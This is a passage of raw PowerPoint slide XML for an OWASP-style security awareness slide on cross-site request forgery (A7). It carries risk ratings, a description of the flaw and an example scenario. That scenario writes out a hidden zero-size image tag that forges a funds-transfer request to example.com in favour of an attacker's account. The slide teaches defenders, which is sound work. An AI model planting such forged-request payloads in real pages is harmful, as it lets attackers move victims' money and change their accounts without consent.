                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52"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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>   Vectors</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800600" y="1049628"/>
                <a:ext cx="685800" cy="428655"/>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00" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Technical</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>   Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="54" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="762000" y="1262418"/>
                <a:ext cx="534537" cy="123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55" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2188570" y="1262418"/>
                <a:ext cx="630830" cy="1233"/>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56" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="50" idx="3"/>
                <a:endCxn id="53" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3899848" y="1263956"/>
                <a:ext cx="900752" cy="421"/>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57" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="304800" y="1280701"/>
                <a:ext cx="516488" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="58" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923128" y="1073877"/>
                <a:ext cx="762000" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Business</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="59" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="53" idx="4"/>
                <a:endCxn id="58" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1263956"/>
                <a:ext cx="436728" cy="421"/>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1" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1091049"/>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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1235639"/>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3" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>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dirty="0" smtClean="0"/>
              <a:t>A7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20209014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 name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125936680"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="951722"/>
          <a:ext cx="6858000" cy="2553478"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="649591">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r>
              <a:tr h="39693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rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>UNCOMMON</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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>EASY</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERATE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Application / Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</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506956">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> anyone who can load content into your users’ browsers, and thus force them to submit a request to your website, including any website or other HTML feed that your users visit.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attackers create forged HTTP requests and trick a victim into submitting them via image tags, iframes, XSS, or various other techniques. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>If the user is authenticated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, the attack succeeds.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CSRF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> takes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> advantage of the fact that most web apps allow attackers to predict all the details of a particular action.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Because browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detection of CSRF flaws is fairly easy via penetration testing or code analysis.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attackers can trick victims into performing any state changing operation the victim is authorized to perform</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> (e.g., </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>updating account details, making purchases, modifying data).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider the business value of the affected data or application functions</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Imagine not being sure if users intended to take these actions.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider the impact to your reputation.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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Example Attack Scenario</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The application allows a user to submit a state changing request that does not include anything secret. For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://example.com/app/transferFunds?amount=1500</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &amp;destinationAccount=4673243243</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So, the attacker constructs a request that will transfer money from the victim’s account to the attacker’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img src="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/app/transferFunds?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  amount=1500&amp;destinationAccount=attackersAcct#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  width="0" height="0" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the victim visits any of the attacker’s sites while already authenticated to example.com, these forged requests will automatically include the user’s session info, authorizing the attacker’s request.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="35814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Am I Vulnerable to CSRF?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
